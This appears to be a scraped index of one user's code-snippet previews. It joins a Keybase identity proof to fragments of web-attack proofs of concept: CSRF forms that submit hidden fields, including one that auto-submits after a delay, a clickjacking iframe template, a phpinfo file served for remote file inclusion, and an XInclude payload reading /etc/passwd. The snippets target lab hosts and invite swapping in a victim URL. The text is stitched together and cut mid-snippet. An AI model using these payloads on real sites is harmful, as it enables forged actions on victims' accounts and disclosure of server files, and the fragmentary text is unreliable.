I hereby claim:
- I am jakekarnes42 on github.
- I am jakekarnes (https://keybase.io/jakekarnes) on keybase.
- I have a public key ASCRTEY9DgdyMbIG7PHshYfpHvzbpTh_iv5IFqJtrGxZPQo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
<!-- | |
PoC only. Useful for CSRF involving JSON values. Must actually click button to submit. | |
Submits a request that looks like the following: | |
POST /oneliner/ws/vulnerable/oneliners HTTP/1.1 | |
Host: local.1-liner.org | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 |
<!-- Replace the iFrame source with victim URL--> | |
<html> | |
<style> | |
iframe { | |
width:1000px; | |
height:500px; | |
top:0; left:0; | |
border: 10px solid black; | |
} | |
</style> |
<html> | |
<body> | |
<!–– Change URL and params below--> | |
<form method="POST" action="http://owaspbwa/ghost/blogView.php"> | |
<input type="hidden" name="vuln" value="me so dumb"/> | |
<input type="hidden" name="user" value="admin"/> | |
<input type="submit" value="Submit"> | |
</form> | |
</body> | |
<html> |
<html> | |
<head> | |
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> | |
<script type="text/javascript">$(document).ready(function (){ | |
setTimeout("$('#target').submit()", 3000); | |
});</script> | |
</head> | |
<body> | |
<h1>Loading...</h1> | |
<!–– Change URL and params below--> |
<html> | |
<head></head> | |
<body> | |
<h1>Hello world!</h1> | |
</body> | |
<html> | |
<html> | |
<head> | |
<title>PHP Test</title> | |
</head> | |
<body> | |
<?php echo '<p>Hello World</p>'; ?> | |
</body> | |
</html> |
$ mkdir evil_files | |
$ cat > evil_files/phpinfo.txt | |
<?php | |
phpinfo(); | |
?> | |
Next, we need to serve the file. Python has a built in web server module we can use for this. | |
$ cd evil_files | |
$ python -m SimpleHTTPServer |
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> | |
<xi:include parse="text" href="file:///etc/passwd"/></foo> |